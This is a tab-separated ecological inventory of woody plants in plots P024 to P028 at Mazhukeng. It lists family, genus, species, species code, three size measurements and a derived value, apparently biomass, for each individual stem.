Mazhukeng	1	P024	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	1.5	1.8	1.5	0.000229473
Mazhukeng	1	P024	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	2	4	3	0.000864223
Mazhukeng	1	P024	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	4	5	2	0.00395057
Mazhukeng	1	P024	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	3.5	4.5	2	0.00277222
Mazhukeng	1	P024	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	8	8	3.5	0.0230299
Mazhukeng	1	P024	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	3	1.4	0.0013926
Mazhukeng	1	P024	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	4.5	1.8	0.00541185
Mazhukeng	1	P024	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	5	2.5	0.00230323
Mazhukeng	1	P024	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	5	3.5	0.00395057
Mazhukeng	1	P024	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	5.5	3	0.00252993
Mazhukeng	1	P024	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	6	3.5	0.0101137
Mazhukeng	1	P024	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	17	6.5	1.8	0.0771673
Mazhukeng	1	P024	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	18	7	2	0.092404
Mazhukeng	1	P024	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	7.5	5	0.0125998
Mazhukeng	1	P024	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	8	5	0.0179278
Mazhukeng	1	P024	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3.5	2.5	0.000757716
Mazhukeng	1	P024	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2.5	3.5	1.8	0.00115149
Mazhukeng	1	P024	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	4.5	3	0.00356116
Mazhukeng	1	P024	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	7	2	0.011772
Mazhukeng	1	P024	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.5	2.5	2	0.000317142
Mazhukeng	1	P024	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3	1.4	0.000650978
Mazhukeng	1	P024	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3.5	1.5	0.000757716
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	1.8	0.8	0.000229473
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.7	1.9	0.8	0.000306061
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	2	1.2	0.000254566
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.2	1.8	0.000479616
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	1.5	0.000379528
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.8	3	1.9	0.000534254
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.8	0.000650978
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.5	0.000650978
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	3	1.4	0.000989284
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	3	1.7	0.000989284
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	0.6	0.0013926
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3.5	1.6	0.000441757
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.8	0.000757716
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.7	0.000757716
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	1.8	0.00162093
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	3.5	1.7	0.00278028
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4	3	0.000503852
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	4	1.5	0.00131335
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	2	0.00184878
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	7	4	1.4	0.00905786
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4.5	1.8	0.00097053
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	1	0.00395057
Mazhukeng	1	P025	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	5	1.3	0.00600364
Mazhukeng	1	P025	Euphorbiaceae	Glochidion	Glochidion lanceolarium Voigt [G. macrophyllum Benth.]	GLOLAN	3	8	6	0.00365921
Mazhukeng	1	P025	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	3	2	0.0013926
Mazhukeng	1	P025	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	5	3.5	0.00230323
Mazhukeng	1	P025	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2.5	5.5	5	0.00179723
Mazhukeng	1	P025	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	4	5.5	3	0.00433941
Mazhukeng	1	P025	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	6	5.5	0.00275631
Mazhukeng	1	P025	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	7	6	4	0.0135042
Mazhukeng	1	P025	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	7	6.5	0.00320825
Mazhukeng	1	P025	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	7.5	6.8	0.00343384
Mazhukeng	1	P025	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3.5	8	7.5	0.00488592
Mazhukeng	1	P025	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.5	2	1.8	0.000663557
Mazhukeng	1	P025	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.5	2.2	0.4	0.000728867
Mazhukeng	1	P025	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	3	2.8	0.0013926
Mazhukeng	1	P025	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3.5	3	0.000757716
Mazhukeng	1	P025	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	6	5	3.2	0.00845122
Mazhukeng	1	P025	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.2	2.2	1.6	0.000183999
Mazhukeng	1	P025	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	8	1.8	0.0492664
Mazhukeng	1	P025	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	8.5	3.5	0.0698301
Mazhukeng	1	P025	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	22	9	2	0.172442
Mazhukeng	1	P025	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	3	3.8	1.6	0.0017577
Mazhukeng	1	P025	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	3	3.8	1.6	0.0017577
Mazhukeng	1	P025	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	4.8	1.8	0.00221246
Mazhukeng	1	P025	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4.5	5	2	0.00492716
Mazhukeng	1	P025	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	1.5	2.2	1.5	0.000279622
Mazhukeng	1	P025	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	1.5	2.5	1.5	0.000317142
Mazhukeng	1	P025	Fagaceae	Cyclobalanopsis	Cyclobalanopsis myrsinaefolius (Bl.) Oerst.	CYCMYR	4	6	3.5	0.00472771
Mazhukeng	1	P025	Fagaceae	Cyclobalanopsis	Cyclobalanopsis myrsinaefolius (Bl.) Oerst.	CYCMYR	20	7	1.6	0.112592
Mazhukeng	1	P025	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	5.5	4	0.00928302
Mazhukeng	1	P025	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	6	2	0.0101137
Mazhukeng	1	P025	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6.5	4	0.0146119
Mazhukeng	1	P025	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	3.2	0.0201917
Mazhukeng	1	P025	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	25	8	1.3	0.195157
Mazhukeng	1	P025	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	4	7	1.8	0.00550289
Mazhukeng	1	P025	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1.5	1.4	0.5	0.000179155
Mazhukeng	1	P025	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1.5	1.6	0.3	0.000204338
Mazhukeng	1	P025	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1.5	1.6	0.9	0.000204338
Mazhukeng	1	P025	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	1.8	0.4	0.000393599
Mazhukeng	1	P025	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2.5	2.2	1	0.000728867
Mazhukeng	1	P025	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	7	2.5	1.7	0.00570132
Mazhukeng	1	P025	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3.5	5	1.2	0.00307536
Mazhukeng	1	P025	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.2	0.4	0.3	3.43233e-05
Mazhukeng	1	P025	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	1.5	1.3	0.000703595
Mazhukeng	1	P025	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	4	2.5	1.7	0.00199599
Mazhukeng	1	P025	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.2	4	0.5	0.00033155
Mazhukeng	1	P025	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	4	1.5	0.000864223
Mazhukeng	1	P025	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	4	0.8	0.00184878
Mazhukeng	1	P025	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	4.5	1.8	0.0020762
Mazhukeng	1	P025	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	1.2	1.7	1	0.000142734
Mazhukeng	1	P025	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	1.2	1.8	0.3	0.000151
Mazhukeng	1	P025	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	1.3	2.1	1.5	0.000204227
Mazhukeng	1	P025	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	1.5	2.2	1.6	0.000279622
Mazhukeng	1	P025	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	1.5	2.2	1.5	0.000279622
Mazhukeng	1	P025	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	1.8	2.3	1.6	0.000411235
Mazhukeng	1	P025	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	2	2.5	1.7	0.000543971
Mazhukeng	1	P025	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	1.8	3	1.8	0.000534254
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	2	1	0.000934077
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	1.4	0.000543971
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	1.4	0.000543971
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	2.5	1.2	0.00303328
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	1.2	0.000379528
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	0.6	0.000650978
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.2	3.5	1.2	0.000290689
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	3.5	0.7	0.00278028
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.5	0.00184878
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.5	0.00184878
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	4	1.2	0.00481906
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	6	4	0.6	0.0067837
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4.5	3	0.0020762
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	5	1	0.00107666
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5.5	1.5	0.00433941
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	6	3	0.00718464
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	6	6	1.5	0.0101137
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	8	6.5	0.4	0.0187703
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	10	7.5	0.8	0.0328428
Mazhukeng	1	P026	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	6	8	6	0.0134267
Mazhukeng	1	P026	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	4	3.5	2	0.00278028
Mazhukeng	1	P026	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	6	4	2	0.0067837
Mazhukeng	1	P026	Lauraceae	Litsea	Litsea yunnanensis	LITYUN	16	8	1.6	0.0845033
Mazhukeng	1	P026	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	18	9.5	5.5	0.124831
Mazhukeng	1	P026	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.2	2.5	2	0.000208689
Mazhukeng	1	P026	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2.5	1.8	0.000317142
Mazhukeng	1	P026	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3	2	0.000650978
Mazhukeng	1	P026	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	3.5	1.4	0.00162093
Mazhukeng	1	P026	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	4	4	1.3	0.00317108
Mazhukeng	1	P026	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	5	4	1.6	0.00481906
Mazhukeng	1	P026	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	7	2.3	0.0431948
Mazhukeng	1	P026	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	9.5	5	0.0414532
Mazhukeng	1	P026	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	20	11	6	0.175732
Mazhukeng	1	P026	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	3	2.5	1.6	0.00116368
Mazhukeng	1	P026	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2.5	4	2	0.00131335
Mazhukeng	1	P026	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	5.5	3	0.00659455
Mazhukeng	1	P026	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	5	2.5	0.6	0.00303328
Mazhukeng	1	P026	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	4	6	5	0.00472771
Mazhukeng	1	P026	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	10	7.5	2.2	0.0328428
Mazhukeng	1	P026	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	3	4	3.2	0.00184878
Mazhukeng	1	P026	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	5	5.5	3	0.00659455
Mazhukeng	1	P026	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	6	6.5	3	0.0109433
Mazhukeng	1	P026	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	9	8	4	0.0287229
Mazhukeng	1	P026	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	6	3	0.0173473
Mazhukeng	1	P026	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6.5	3.6	0.0146119
Mazhukeng	1	P026	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	6.5	2.2	0.028525
Mazhukeng	1	P026	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	20	6.5	2.1	0.104667
Mazhukeng	1	P026	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	7	3	0.0157184
Mazhukeng	1	P026	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	18	9.5	5.5	0.124831
Mazhukeng	1	P026	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	4	2	1.2	0.00160216
Mazhukeng	1	P026	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	3	4	3	0.00184878
Mazhukeng	1	P026	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	3	2	0.0013926
Mazhukeng	1	P026	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	4	2	0.00317108
Mazhukeng	1	P026	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	4.5	2.8	0.0020762
Mazhukeng	1	P026	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	4.5	1.4	0.0020762
Mazhukeng	1	P027	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	2	0.000543971
Mazhukeng	1	P027	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	2.5	1.6	0.00116368
Mazhukeng	1	P027	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	1.4	0.000379528
Mazhukeng	1	P027	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.6	0.000650978
Mazhukeng	1	P027	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3.5	1.3	0.000441757
Mazhukeng	1	P027	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.4	0.000757716
Mazhukeng	1	P027	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.5	0.000757716
Mazhukeng	1	P027	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	3.5	2	0.00278028
Mazhukeng	1	P027	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.7	0.00184878
Mazhukeng	1	P027	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4.2	1.8	0.00193979
Mazhukeng	1	P027	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4.5	1.4	0.00097053
Mazhukeng	1	P027	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	1.5	0.00395057
Mazhukeng	1	P027	Rosaceae	Rhaphiolepis	Rhaphiolepis indica Lindl.	RHAIND	2	2.5	1.6	0.000543971
Mazhukeng	1	P027	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	4	5.5	2	0.00433941
Mazhukeng	1	P027	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	5.5	3.8	0.00659455
Mazhukeng	1	P027	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	6	4.5	0.0101137
Mazhukeng	1	P027	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	7.5	4	0.0216115
Mazhukeng	1	P027	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.2	2.4	1.4	0.000624807
Mazhukeng	1	P027	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	4.5	2	0.0020762
Mazhukeng	1	P027	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	2	2.5	2	0.000543971
Mazhukeng	1	P027	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	2	4	2	0.000864223
Mazhukeng	1	P027	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	3	5	1.6	0.00230323
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	7	3	0.00836267
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	8	4	0.0230299
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	9.5	5.5	0.077915
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	16	9.5	6	0.100089
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	17	9.5	5.5	0.112141
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	10	6	0.0613767
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	10	4	0.0613767
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	10	4	0.0819525
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	2	11	4.2	0.00234073
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	11	4.2	0.0900186
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	16	11	3.8	0.115637
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	17	11	5	0.129562
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	23	12	6.5	0.248834
Mazhukeng	1	P027	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	22	13	2.5	0.247709
Mazhukeng	1	P027	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	6.5	3.2	0.007774
Mazhukeng	1	P027	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3	1.4	0.000650978
Mazhukeng	1	P027	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3.5	1.4	0.000757716
Mazhukeng	1	P027	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3.5	1.5	0.000757716
Mazhukeng	1	P027	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2.5	3.5	1.8	0.00115149
Mazhukeng	1	P027	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	3.5	1.6	0.00162093
Mazhukeng	1	P027	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	4	2	0.00184878
Mazhukeng	1	P027	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	4	1.6	0.00184878
Mazhukeng	1	P027	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	4	4	2	0.00317108
Mazhukeng	1	P027	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	4	4.5	2	0.00356116
Mazhukeng	1	P027	Rubiaceae	Gardenia	Gardenia jasminoides	GARJAS	2	3	1.5	0.000650978
Mazhukeng	1	P028	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	2	1.5	0.000254566
Mazhukeng	1	P028	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	1	0.00230323
Mazhukeng	1	P028	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	6	3.5	0.00275631
Mazhukeng	1	P028	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	3	7	2.5	0.00320825
Mazhukeng	1	P028	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	5	7.5	5	0.00895072
Mazhukeng	1	P028	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	6	9	6	0.0150783
Mazhukeng	1	P028	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	6	7.5	3.5	0.0125998
Mazhukeng	1	P028	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	12	10	6	0.0613767
Mazhukeng	1	P028	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	3.5	2	0.00422516
Mazhukeng	1	P028	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	5	2.2	0.00230323
Mazhukeng	1	P028	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	6	3	0.00472771
Mazhukeng	1	P028	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	6.5	2	0.00511552
Mazhukeng	1	P028	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	7.5	5	0.0125998
Mazhukeng	1	P028	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	2.2	1.2	0.00102601
Mazhukeng	1	P028	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	4	1.6	0.000864223
Mazhukeng	1	P028	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	4	5	4	0.00395057
Mazhukeng	1	P028	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	5	5.5	5	0.00659455
